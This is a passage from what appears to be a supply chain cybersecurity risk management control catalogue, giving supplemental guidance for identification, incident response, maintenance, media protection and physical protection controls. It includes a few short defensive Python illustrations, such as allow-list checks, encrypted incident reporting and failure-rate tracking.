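    def register(self, enterprise_id, supplier, supplier_id, received=None):
        record = {
            "enterprise_id": enterprise_id,
            "supplier": supplier,
            "supplier_id": supplier_id,
            "received": received or date.today(),
        }
        self._by_enterprise_id[enterprise_id] = record
        self._by_supplier_id[(supplier, supplier_id)] = record

    def trace(self, supplier, supplier_id):
        """Find the enterprise record for a supplier-tracked item."""
        return self._by_supplier_id.get((supplier, supplier_id))

registry = IdentifierRegistry()
registry.register("ENT-000123", "ExampleSupplier", "SUP-98765")
print(registry.trace("ExampleSupplier", "SUP-98765")["enterprise_id"])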
IA-5 AUTHENTICATOR MANAGEMENT
Supplemental C-SCRM Guidance: This control facilitates traceability and non-repudiation throughout the
supply chain. Enterprises should require their prime contractors to implement this control and flow down
this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1) AUTHENTICATOR MANAGEMENT | CHANGE AUTHENTICATORS PRIOR TO DELIVERY
Supplemental C-SCRM Guidance: This enhancement verifies the chain of custody within the
enterprise’s supply chain.
Level(s): 3
(2) AUTHENTICATOR MANAGEMENT | FEDERATED CREDENTIAL MANAGEMENT
Supplemental C-SCRM Guidance: This enhancement facilitates provenance and chain of custody
within the enterprise’s supply chain.
Level(s): 3
IA-8 IDENTIFICATION AND AUTHENTICATION (NON-ORGANIZATIONAL USERS)
Supplemental C-SCRM Guidance: Suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers have the potential to engage the enterprise’s supply
chain for service delivery (e.g., development/integration services, product support, etc.). Enterprises should
manage the establishment, auditing, use, and revocation of identification credentials and the authentication
of non-enterprise users within the supply chain. Enterprises should also ensure promptness in performing
identification and authentication activities, especially in the case of revocation management, to help
mitigate exposure to cybersecurity risks throughout the supply chain such as those that arise due to insider
threats.
Level(s): 2, 3
IA-9 SERVICE IDENTIFICATION AND AUTHENTICATION
Supplemental C-SCRM Guidance: Enterprises should ensure that identification and authentication are
defined and managed for access to services (e.g., web applications using digital certificates, services or
applications that query a database as opposed to labor services) throughout the supply chain. Enterprises
should ensure that they know what services are being procured and from whom. Services procured should
be listed on a validated list of services for the enterprise or have compensating controls in place.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
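For illustration only, a sketch of service identification and authentication against a validated list, assuming a TLS-protected service endpoint; the host name and allow-list contents are hypothetical:

# Illustrative sketch: authenticate a procured service's TLS endpoint and
# check it against a validated list of approved services. Host names and
# the approved-list contents are hypothetical.
import socket
import ssl

APPROVED_SERVICES = {"service.example-supplier.com"}  # hypothetical allow-list

def authenticate_service(host: str, port: int = 443) -> dict:
    if host not in APPROVED_SERVICES:
        raise PermissionError(f"{host} is not on the validated list of services")
    context = ssl.create_default_context()  # verifies cert chain and hostname
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()  # certificate details for audit records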
FAMILY: INCIDENT RESPONSE
[FIPS 200] specifies the Incident Response minimum security requirement as follows:
Organizations must: (i) establish an operational incident handling capability for
organizational information systems that includes adequate preparation, detection,
analysis, containment, recovery, and user response activities; and (ii) track, document,
and report incidents to appropriate organizational officials and/or authorities.
Supply chain compromises may span suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. Enterprises should ensure that
their incident response controls address C-SCRM including what, when, and how information
about incidents will be reported or shared by, with, or between suppliers, developers, system
integrators, external system service providers, other ICT/OT-related service providers, and any
relevant interagency bodies. Incident response will help determine whether an incident is related
to the supply chain.
IR-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should integrate C-SCRM into incident response policy and
procedures, and related C-SCRM Strategy/Implementation Plans and Policies. The policy and procedures
must provide direction for how to address supply chain-related incidents and cybersecurity incidents that
may complicate or impact the supply chain. Individuals who work within specific mission and system
environments need to recognize cybersecurity supply chain-related incidents. The incident response policy
should state when and how threats and incidents should be handled, reported, and managed.
Additionally, the policy should define when, how, and with whom to communicate to the FASC (Federal
Acquisition Security Council) and other stakeholders or partners within the broader supply chain in the
event of a cyber threat or incident. Departments and agencies must notify the FASC of supply chain risk
information when the FASC requests information relating to a particular source, covered article, or
covered procurement, or when an executive agency has determined that there is a reasonable basis to
conclude that a substantial supply chain risk associated with a source, covered procurement, or covered article exists. In such
instances, the executive agency shall provide the FASC with relevant information concerning the source or
covered article, including 1) the supply chain risk information identified through the course of the agency’s
activities in furtherance of mitigating, identifying, or managing its supply chain risk and 2) the supply chain
risk information regarding covered procurement actions by the agency under the Federal Acquisition
Supply Chain Security Act of 2018 (FASCSA) 41 U.S.C. § 4713; and any orders issued by the agency
under 41 U.S.C. § 4713.
Bidirectional communication with supply chain partners should be defined in agreements with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers to inform all involved parties of a supply chain cybersecurity incident. Incident information may
also be shared with enterprises such as the Federal Bureau of Investigation (FBI), US CERT (United States
Computer Emergency Readiness Team), and the NCCIC (National Cybersecurity and Communications
Integration Center) as appropriate. Depending on the severity of the incident, accelerated
communications up and down the supply chain may be necessary. Appropriate agreements should be put in
place with suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers to ensure speed of communication, response, corrective actions, and other related
activities. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
In Level 2 and Level 3, procedures and enterprise-specific incident response methods must be in place,
training completed (consider including Operations Security [OPSEC] and any appropriate threat briefing in
training), and coordinated communication established throughout the supply chain to ensure an efficient
and coordinated incident response effort.
Level(s): 1, 2, 3
Control Enhancement(s):
(1) POLICY AND PROCEDURES | C-SCRM INCIDENT INFORMATION SHARING
Supplemental C-SCRM Guidance: Enterprises should ensure that their incident response policies and procedures provide guidance on
effective information sharing of incidents and other key risk indicators in the supply chain. Guidance
should – at a minimum – cover the collection, synthesis, and distribution of incident information from
a diverse set of data sources, such as public data repositories, paid subscription services, and in-house
threat intelligence teams.
Enterprises that operate in the public sector should include specific guidance on when and how to
communicate with interagency partnerships, such as the FASC (Federal Acquisition Security Council)
and other stakeholders or partners within the broader supply chain, in the event of a cyber threat or
incident.
Departments and agencies must notify the FASC of supply chain risk information when:
1) The FASC requests information relating to a particular source or covered article, or
2) An executive agency has determined that there is a reasonable basis to conclude that a
substantial supply chain risk associated with a source, covered procurement, or covered article
exists.
In such instances, the executive agency shall provide the FASC with relevant information concerning
the source or covered article, including:
1) Supply chain risk information identified through the course of the agency’s activities in
furtherance of mitigating, identifying, or managing its supply chain risk and
2) Supply chain risk information regarding covered procurement actions by the agency under the
Federal Acquisition Supply Chain Security Act of 2018 (FASCSA) 41 U.S.C. § 4713; and
any orders issued by the agency under 41 U.S.C. § 4713.
Level(s): 1, 2, 3
IR-2 INCIDENT RESPONSE TRAINING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in incident
response training. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
IR-3 INCIDENT RESPONSE TESTING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in and/or
provided with incident response testing.
Level(s): 2, 3
IR-4 INCIDENT HANDLING
Supplemental C-SCRM Guidance: Suspected cybersecurity supply chain events may trigger an
organization’s C-SCRM incident handling processes. Refer to Appendix G: Task 3.4 for examples of
supply chain events. C-SCRM-specific supplemental guidance is provided in control enhancements.
Level(s): 1, 2, 3
Control Enhancement(s):
(6) INCIDENT HANDLING | INSIDER THREATS
Supplemental C-SCRM Guidance: This enhancement helps limit exposure of the C-SCRM information
systems, networks, and processes to insider threats. Enterprises should ensure that insider threat
incident handling capabilities account for the potential of insider threats associated with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers’ personnel with access to ICT/OT systems within the authorization boundary.
Level(s): 1, 2, 3
(7) INCIDENT HANDLING | INSIDER THREATS – INTRA-ORGANIZATION
Supplemental C-SCRM Guidance: This enhancement helps limit the exposure of C-SCRM information
systems, networks, and processes to insider threats. Enterprises should ensure that insider threat
coordination includes suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers.
Level(s): 1, 2, 3
(10) INCIDENT HANDLING | SUPPLY CHAIN COORDINATION
Supplemental C-SCRM Guidance: A number of enterprises may be involved in managing incidents
and responses for supply chain security. After initially processing the incident and deciding on a course
of action (in some cases, the action may be “no action”), the enterprise may need to coordinate with
their suppliers, developers, system integrators, external system service providers, other ICT/OT-related
service providers, and any relevant interagency bodies to facilitate communications, incident response,
root cause, and corrective actions. Enterprises should securely share information through a coordinated
set of personnel in key roles to allow for a more comprehensive incident handling approach. Selecting
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers with mature capabilities for supporting supply chain cybersecurity incident handling
is important for reducing exposure to cybersecurity risks throughout the supply chain. If transparency
for incident handling is limited due to the nature of the relationship, define a set of acceptable criteria
in the agreement (e.g., contract). A review (and potential revision) of the agreement is recommended,
based on the lessons learned from previous incidents. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2
(11) INCIDENT HANDLING | INTEGRATED INCIDENT RESPONSE TEAM
Supplemental C-SCRM Guidance: An enterprise should include a forensics team and/or capability as
part of an integrated incident response team for supply chain incidents. Where relevant and practical,
integrated incident response teams should also include necessary geographical representation as well as
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
Level(s): 3
IR-5 INCIDENT MONITORING
Supplemental C-SCRM Guidance: Enterprises should ensure that agreements with suppliers include
requirements to track and document incidents, response decisions, and activities.
Level(s): 2, 3
IR-6 INCIDENT REPORTING
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in control
enhancement IR-6 (3).
Level(s): 3
Control Enhancement(s):
(3) INCIDENT REPORTING | SUPPLY CHAIN COORDINATION
Supplemental C-SCRM Guidance: Communications of security incident information from the
enterprise to suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers and vice versa require protection. The enterprise should ensure that
information is reviewed and approved for sending based on its agreements with suppliers and any
relevant interagency bodies. Any escalation of or exception from this reporting should be clearly
defined in the agreement. The enterprise should ensure that incident reporting data is adequately
protected for transmission and received by approved individuals only. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors.
Level(s): 3
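As a simplified illustration (not a prescribed mechanism), incident report data might be encrypted before transmission and released only to approved recipients; this sketch assumes the third-party Python cryptography package, and the recipient address is hypothetical:

# Illustrative sketch: protect incident report data before transmission to
# an approved recipient. Key handling and recipient checks are simplified
# placeholders; real deployments would use enterprise key management.
from cryptography.fernet import Fernet

APPROVED_RECIPIENTS = {"scrm-poc@prime-contractor.example"}  # hypothetical

def prepare_incident_report(report_text: str, recipient: str, key: bytes) -> bytes:
    if recipient not in APPROVED_RECIPIENTS:
        raise PermissionError("Recipient not approved for incident reporting")
    return Fernet(key).encrypt(report_text.encode("utf-8"))

key = Fernet.generate_key()  # in practice, managed by the enterprise's KMS
ciphertext = prepare_incident_report("Suspected counterfeit component ...",
                                     "scrm-poc@prime-contractor.example", key)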
IR-7 INCIDENT RESPONSE ASSISTANCE
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in control
enhancement IR-7 (2).
Level(s): 3
Control Enhancement(s):
(2) INCIDENT RESPONSE ASSISTANCE | COORDINATION WITH EXTERNAL PROVIDERS
Supplemental C-SCRM Guidance: The enterprise’s agreements with prime contractors should specify
the conditions under which a government-approved or -designated third party would be available or
may be required to provide assistance with incident response, as well as the role and responsibility of
that third party.
Level(s): 3
IR-8 INCIDENT RESPONSE PLAN
Supplemental C-SCRM Guidance: Enterprises should coordinate, develop, and implement an incident
response plan that includes information-sharing responsibilities with critical suppliers and, in a federal
context, interagency partners and the FASC. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors.
Related Control(s): IR-10
Level(s): 2, 3
IR-9 INFORMATION SPILLAGE RESPONSE
Supplemental C-SCRM Guidance: The supply chain is vulnerable to information spillage. The enterprise
should include supply chain-related information spills in its information spillage response plan. This may
require coordination with suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers. The details of how this coordination is to be conducted should be
included in the agreement (e.g., contract). Enterprises should require their prime contractors to implement
this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 3
Related Controls: SA-4
FAMILY: MAINTENANCE
[FIPS 200] specifies the Maintenance minimum security requirement as follows:
Organizations must: (i) perform periodic and timely maintenance on organizational
information systems; and (ii) provide effective controls on the tools, techniques,
mechanisms, and personnel used to conduct information system maintenance.
Maintenance is frequently performed by an entity that is separate from the enterprise. As such,
maintenance becomes part of the supply chain. Maintenance includes performing updates and
replacements. C-SCRM should be applied to maintenance situations, including assessing
exposure to cybersecurity risks throughout the supply chain, selecting C-SCRM controls,
implementing those controls, and monitoring them for effectiveness.
MA-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should ensure that C-SCRM is included in maintenance
policies and procedures and any related SCRM Strategy/Implementation Plan, SCRM Policies, and SCRM
Plan(s) for all enterprise information systems and networks. With many maintenance contracts, information
on mission-, enterprise-, and system-specific objectives and requirements is shared between the enterprise
and its suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers, creating potential vulnerabilities and opportunities for attack. In many cases, the
maintenance of systems is outsourced to a system integrator, and as such, appropriate measures must be
taken. Even when maintenance is not outsourced, the supply chain affects upgrades, patches, the frequency
of maintenance, replacement parts, and other aspects of system maintenance.
Maintenance policies should be defined for both the system and the network. The maintenance policy
should reflect controls based on a risk assessment (including criticality analysis), such as remote access, the
roles and attributes of maintenance personnel who have access, the frequency of updates, duration of the
contract, the logistical path and method used for updates or maintenance, and monitoring and audit
mechanisms. The maintenance policy should state which tools are explicitly allowed or not allowed. For
example, in the case of software maintenance, the contract should state the accessibility of source code,
test cases, and other items needed to maintain a system or components.
Maintenance policies should be refined and augmented at each level. At Level 1, the policy should
explicitly assert that C-SCRM should be applied throughout the SDLC, including maintenance activities.
At Level 2, the policy should reflect the mission operation’s needs and critical functions. At Level 3, it
should reflect the specific system needs. The requirements in Level 1, such as nonlocal maintenance,
should flow to Level 2 and Level 3. For example, when nonlocal maintenance is not allowed by Level 1, it
should also not be allowed at Level 2 or Level 3.
The enterprise should communicate applicable maintenance policy requirements to relevant prime
contractors and require that they implement this control and flow down this requirement to relevant sub-tier
contractors.
Level(s): 1, 2, 3
MA-2 CONTROLLED MAINTENANCE
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in control
enhancement MA-2 (2).
Control Enhancement(s):
(2) CONTROLLED MAINTENANCE | AUTOMATED MAINTENANCE ACTIVITIES
Supplemental C-SCRM Guidance: Enterprises should ensure that all automated maintenance activities
for supply chain systems and networks are controlled and managed according to the maintenance
policy. Examples of automated maintenance activities can include COTS product patch updates, call
home features with failure notification feedback, etc. Managing these activities may require
establishing staging processes with appropriate supporting mechanisms to provide vetting or filtering
as appropriate. Staging processes may be especially important for critical systems and components.
Level(s): 3
MA-3 MAINTENANCE TOOLS
Supplemental C-SCRM Guidance: Maintenance tools are considered part of the supply chain. They also
have a supply chain of their own. C-SCRM should be integrated when the enterprise acquires or upgrades a
maintenance tool (e.g., an update to the development environment or testing tool), including during the
selection, ordering, storage, and integration of the maintenance tool. The enterprise should perform
continuous review and approval of maintenance tools, including those maintenance tools in use by external
service providers. The enterprise should also integrate C-SCRM when evaluating replacement parts for
maintenance tools. This control may be performed at both Level 2 and Level 3, depending on how an
agency handles the acquisition, operations, and oversight of maintenance tools.
Level(s): 2, 3
Control Enhancement(s):
(1) MAINTENANCE TOOLS | INSPECT TOOLS
Supplemental C-SCRM Guidance: The enterprise should deploy acceptance testing to verify that the
maintenance tools of the ICT supply chain infrastructure are as expected. Maintenance tools should be
authorized with appropriate paperwork, verified as claimed through initial verification, and tested for
vulnerabilities, appropriate security configurations, and stated functionality.
Level(s): 3
(2) MAINTENANCE TOOLS | INSPECT MEDIA
Supplemental C-SCRM Guidance: The enterprise should verify that the media containing diagnostic
and test programs that suppliers use on the enterprise’s information systems operates as expected and
provides only required functions. The use of media from maintenance tools should be consistent with
the enterprise’s policies and procedures and pre-approved. Enterprises should also ensure that the
functionality does not exceed that which was agreed upon.
Level(s): 3
(3) MAINTENANCE TOOLS | PREVENT UNAUTHORIZED REMOVAL
Supplemental C-SCRM Guidance: The unauthorized removal of systems and network maintenance
tools from the supply chain may introduce supply chain risks, such as unauthorized modification,
replacement with counterfeit, or malware insertion while the tool is outside of the enterprise’s control.
Systems and network maintenance tools can include an integrated development environment (IDE),
testing, or vulnerability scanning. For C-SCRM, it is important that enterprises explicitly
authorize, track, and audit any removal of maintenance tools. Once systems and network tools are
allowed access to an enterprise/information system, they should remain the property/asset of the
system owner and tracked if removed and used elsewhere in the enterprise. ICT maintenance tools
either currently in use or in storage should not be allowed to leave the enterprise’s premises until they
are properly vetted for removal (i.e., maintenance tool removal should not exceed in scope what was
authorized for removal and should be completed in accordance with the enterprise’s established
policies and procedures).
Level(s): 3
MA-4 NONLOCAL MAINTENANCE
Supplemental C-SCRM Guidance: Nonlocal maintenance may be provided by contractor personnel.
Appropriate protections should be in place to manage associated risks. Controls applied to internal
maintenance personnel are applied to any suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers performing a similar maintenance role and enforced
through contractual agreements with their external service providers.
Level(s): 2, 3
Control Enhancement(s):
(1) NONLOCAL MAINTENANCE | COMPARABLE SECURITY AND SANITIZATION
Supplemental C-SCRM Guidance: Should suppliers, developers, system integrators, external system
service providers, or other ICT/OT-related service providers perform any nonlocal maintenance or
diagnostic services on systems or system components, the enterprise should ensure that:
• Appropriate measures are taken to verify that the nonlocal environment meets appropriate
security levels for maintenance and diagnostics per agreements between the enterprise and
vendor;
• Appropriate levels of sanitizing are completed to remove any enterprise-specific data residing
in components; and
• Appropriate diagnostics are completed to ensure that components are sanitized, preventing
malicious insertion prior to returning to the enterprise system or supply chain network.
The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
MA-5 MAINTENANCE PERSONNEL
Supplemental C-SCRM Guidance: Maintenance personnel may be employed by suppliers, developers,
system integrators, external system service providers, or other ICT/OT-related service providers. As such,
appropriate protections should be in place to manage associated risks. The same controls applied to internal
maintenance personnel should be applied to any contractor personnel who perform a similar maintenance
role and enforced through contractual agreements with their external service providers.
Level(s): 2, 3
Control Enhancement(s):
(1) MAINTENANCE PERSONNEL | FOREIGN NATIONALS
Supplemental C-SCRM Guidance: The vetting of foreign nationals with access to critical non-national
security systems/services must take C-SCRM into account and be extended to all relevant contractor
personnel. Enterprises should specify in agreements any restrictions or vetting requirements that
pertain to foreign nationals and flow the requirements down to relevant subcontractors.
Level(s): 2, 3
MA-6 TIMELY MAINTENANCE
Supplemental C-SCRM Guidance: The enterprise should purchase spare parts, replacement parts, or
alternative sources through original equipment manufacturers (OEMs), authorized distributors, or
authorized resellers and ensure appropriate lead times. If OEMs are not available, it is preferred to acquire
from authorized distributors. If an OEM or an authorized distributor is not available, then it is preferred to
acquire from an authorized reseller. Enterprises should obtain verification on whether the distributor or
reseller is authorized. Where possible, enterprises should use an authorized distributor/dealer approved list.
If the only alternative is to purchase from a non-authorized distributor or secondary market, a risk
assessment should be performed, including revisiting the criticality and threat analysis to identify additional
risk mitigations to be used. For example, the enterprise should check the supply source for a history of
counterfeits, inappropriate practices, or a criminal record. See Section 2 for criticality and threat analysis
details. The enterprise should maintain a bench stock of critical OEM parts, if feasible, when the
acquisition of such parts may not be accomplished within needed timeframes.
Level(s): 3
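An illustrative sketch of the source-preference order described above (OEM, then authorized distributor, then authorized reseller); the vendor data and fallback handling are hypothetical:

# Illustrative sketch of the acquisition-source preference described in
# MA-6. Source data and the risk-assessment hook are hypothetical.
PREFERENCE_ORDER = ["oem", "authorized_distributor", "authorized_reseller"]

def select_source(available: dict) -> tuple:
    """available maps source type to a list of verified vendors."""
    for source_type in PREFERENCE_ORDER:
        vendors = available.get(source_type, [])
        if vendors:
            return source_type, vendors[0]
    # No authorized source: a risk assessment (revisiting criticality and
    # threat analysis) is required before buying on the secondary market.
    return "secondary_market", None

print(select_source({"authorized_distributor": ["DistCo"]}))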
MA-7 FIELD MAINTENANCE
Supplemental C-SCRM Guidance: Enterprises should use trusted facilities when additional rigor and
quality control checks are needed, if at all practical or possible. Trusted facilities should be on an approved
list and have additional controls in place.
Related Control(s): MA-2, MA-4, MA-5
Level(s): 3
MA-8 MAINTENANCE MONITORING AND INFORMATION SHARING (NEW)
Control: The enterprise monitors the status of systems and components and communicates out-of-bounds
and out-of-spec performance to suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers. The enterprise should also report this information to the
Government-Industry Data Exchange Program (GIDEP).
Supplemental C-SCRM Guidance: Tracking the failure rates of components provides useful information to
the acquirer to help plan for contingencies, alternative sources of supply, and replacements. Failure rates
are also useful for monitoring the quality and reliability of systems and components. This information
provides useful feedback to suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers for corrective action and continuous improvement. In Level 2,
agencies should track and communicate the failure rates to suppliers (OEM and/or an authorized
distributor). The failure rates and the issues that can indicate failures, including root causes, should be
identified by an enterprise’s technical personnel (e.g., developers, administrators, or maintenance
engineers) in Level 3 and communicated to Level 2. These individuals are able to verify the problem and
identify technical alternatives.
Related Control(s): IR-4(10)
Level(s): 3
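For illustration only, a minimal sketch of tracking component failure rates and flagging out-of-spec performance for communication to suppliers and GIDEP; the threshold and component data are hypothetical:

# Illustrative sketch: track component failure rates and flag out-of-spec
# performance. The threshold and component data are hypothetical.
from collections import Counter

FAILURE_RATE_THRESHOLD = 0.02  # hypothetical: 2% failure rate

def out_of_spec(components_fielded: dict, failures: Counter) -> list:
    """Return components whose observed failure rate exceeds the threshold."""
    flagged = []
    for component, fielded in components_fielded.items():
        rate = failures[component] / fielded if fielded else 0.0
        if rate > FAILURE_RATE_THRESHOLD:
            flagged.append((component, round(rate, 4)))
    return flagged

fielded = {"router-x1": 500, "psu-a2": 1200}
failures = Counter({"router-x1": 3, "psu-a2": 40})
print(out_of_spec(fielded, failures))   # [('psu-a2', 0.0333)]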
FAMILY: MEDIA PROTECTION
[FIPS 200] specifies the Media Protection minimum security requirement as follows:
Organizations must: (i) protect information system media, both paper and digital; (ii)
limit access to information on information system media to authorized users; and (iii)
sanitize or destroy information system media before disposal or release for reuse.
Media itself can be a component traversing the supply chain or containing information about the
enterprise’s supply chain. This includes both physical and logical media, such as system
documentation on paper or in electronic files, shipping and delivery documentation with acquirer
information, memory sticks with software code, or complete routers or servers that include
permanent media. The information contained on the media may be sensitive or proprietary
information. Additionally, the media is used throughout the SDLC, from concept to disposal.
Enterprises should ensure that media protection controls are applied to both an enterprise’s
media and the media received from suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers throughout the SDLC.
MP-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Various documents and information on a variety of physical and
electronic media are disseminated throughout the supply chain. This information may contain a variety of
sensitive information and intellectual property from suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers and should be appropriately
protected. Media protection policies and procedures should also address supply chain concerns, including
media in the enterprise’s supply chain and throughout the SDLC.
Level(s): 1, 2
MP-4 MEDIA STORAGE
Supplemental C-SCRM Guidance: Media storage controls should include C-SCRM activities. Enterprises
should specify and include in agreements (e.g., contracting language) media storage requirements (e.g.,
encryption) for their suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers. The enterprise should require its prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors.
Level(s): 1, 2
MP-5 MEDIA TRANSPORT
Supplemental C-SCRM Guidance: The enterprise should incorporate C-SCRM activities when media is
transported by enterprise or non-enterprise personnel. Some of the techniques to protect media during
transport and storage include cryptographic techniques and approved custodian services.
Level(s): 1, 2
MP-6 MEDIA SANITIZATION
Supplemental C-SCRM Guidance: Enterprises should specify and include in agreements (e.g., contracting
language) media sanitization policies for their suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. Media is used throughout the SDLC. Media
traversing or residing in the supply chain may originate anywhere, including from suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers. It can be
new, refurbished, or reused. Media sanitization is critical to ensuring that information is removed before the
media is used, reused, or discarded. For media that contains privacy or other sensitive information (e.g.,
CUI), the enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
Related Controls: MP-6(1), MP-6(2), MP-6(3), MP-6(7), MP-6(8)
FAMILY: PHYSICAL AND ENVIRONMENTAL PROTECTION
[FIPS 200] specifies the Physical and Environmental Protection minimum security requirement
as follows:
Organizations must: (i) limit physical access to information systems, equipment, and the
respective operating environments to authorized individuals; (ii) protect the physical
plant and support infrastructure for information systems; (iii) provide supporting utilities
for information systems; (iv) protect information systems against environmental hazards;
and (v) provide appropriate environmental controls in facilities containing information
systems.
Supply chains span the physical and logical world. Physical factors can include weather and road
conditions that may impact the transportation of cyber components (or devices) from one
location to another between persons or enterprises within a supply chain. If not properly
addressed as a part of the C-SCRM risk management processes, physical and environmental risks
may have negative impacts on the enterprise’s ability to receive critical components in a timely
manner, which may in turn impact their ability to perform mission operations. Enterprises should
require the implementation of appropriate physical and environmental controls within their
supply chain.
PE-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The enterprise should integrate C-SCRM practices and requirements
into their own physical and environmental protection policy and procedures. The degree of protection
should be commensurate with the degree of integration. The physical and environmental protection policy
should ensure that the physical interfaces of the supply chain have adequate protection and audit for such
protection.
Level(s): 1, 2, 3
PE-2 PHYSICAL ACCESS AUTHORIZATIONS
Supplemental C-SCRM Guidance: Enterprises should ensure that only authorized individuals with a need
for physical access have access to information, systems, or data centers (e.g., sensitive or classified). Such
authorizations should specify what the individual is permitted or not permitted to do with regard to their
physical access (e.g., view, alter/configure, insert something, connect something, remove, etc.).
Agreements should address physical access authorization requirements, and the enterprise should require its
prime contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Authorization for non-federal employees should follow an approved protocol, which includes
documentation of the authorization and specifies any prerequisites or constraints that pertain to such
authorization (e.g., individual must be escorted by a federal employee, individual must be badged,
individual is permitted physical access during normal business hours, etc.).
Level(s): 2, 3
Control Enhancement(s):
(1) PHYSICAL ACCESS AUTHORIZATIONS | ACCESS BY POSITION OR ROLE
Supplemental C-SCRM Guidance: Role-based authorizations for physical access should include
federal (e.g., agency/department employees) and non-federal employees (e.g., suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers).
When role-based authorization is used, the type and level of access allowed for that role or position
must be pre-established and documented.
Level(s): 2, 3
PE-3 PHYSICAL ACCESS CONTROL
Supplemental C-SCRM Guidance: Physical access control should include individuals and enterprises
engaged in the enterprise’s supply chain. A vetting process based on enterprise-defined requirements and
policy should be in place prior to granting access to the supply chain infrastructure and any relevant
elements. Access establishment, maintenance, and revocation processes should meet enterprise access
control policy rigor. The speed of revocation for suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers who need access to physical facilities and
data centers – either enterprise-owned or external service provider-owned – should be managed in
accordance with the activities performed in their contracts. Prompt revocation is critical when either the
individual's or the enterprise's need for access no longer exists.
Level(s): 2, 3
Control Enhancement(s):
(1) PHYSICAL ACCESS CONTROL | SYSTEM ACCESS
Supplemental C-SCRM Guidance: Physical access controls should be extended to contractor
personnel. Any contractor resources that provide service support with physical access to the supply
chain infrastructure and any relevant elements should adhere to access controls. Policies and
procedures should be consistent with those applied to employee personnel with similar levels of
physical access.
Level(s): 2, 3
(2) PHYSICAL ACCESS CONTROL | FACILITY AND SYSTEMS
Supplemental C-SCRM Guidance: When determining the extent, frequency, and/or randomness of
security checks of facilities, enterprises should account for exfiltration risks that result from covert
listening devices. Such devices may include wiretaps, roving bugs, cell site simulators, and other
eavesdropping technologies that can transfer sensitive information out of the enterprise.
Level(s): 2, 3
(3) PHYSICAL ACCESS CONTROL | TAMPER PROTECTION
Supplemental C-SCRM Guidance: Tamper protection is critical for reducing cybersecurity risk in
products. The enterprise should implement validated tamper protection techniques within the supply
chain. For critical products, the enterprise should require and assess whether and to what extent a
supplier has implemented tamper protection mechanisms. The assessment may also include whether
and how such mechanisms are required and applied by the supplier’s upstream supply chain entities.
Level(s): 2, 3
PE-6 MONITORING PHYSICAL ACCESS
Supplemental C-SCRM Guidance: Individuals who physically access the enterprise or external service
provider’s facilities, data centers, information, or physical asset(s) – including via the supply chain – may
be employed by the enterprise’s employees, on-site or remotely located contractors, visitors, other third
parties (e.g., maintenance personnel under contract with the contractor enterprise), or an individual
affiliated with an enterprise in the upstream supply chain. The enterprise should monitor these individuals’
activities to reduce cybersecurity risks throughout the supply chain or require monitoring in agreements.
Level(s): 1, 2, 3
PE-16 DELIVERY AND REMOVAL
Supplemental C-SCRM Guidance: This control reduces cybersecurity risks that arise during
the physical delivery and removal of hardware components from the enterprise’s information systems or
supply chain. This includes transportation security, the validation of delivered components, and the
verification of sanitization procedures. Risk-based considerations include component mission criticality as
well as the development, operational, or maintenance environment (e.g., classified integration and test
laboratory).
Level(s): 3
PE-17 ALTERNATIVE WORK SITE
Supplemental C-SCRM Guidance: The enterprise should incorporate protections to guard against
cybersecurity risks associated with enterprise employees or contractor personnel within or accessing the
supply chain infrastructure using alternative work sites. This can include third-party personnel who may
also work from alternative worksites.
Level(s): 3
PE-18 LOCATION OF SYSTEM COMPONENTS
Supplemental C-SCRM Guidance: Physical and environmental hazards or disruptions have an impact on
the availability of products that are or will be acquired and physically transported to the enterprise’s
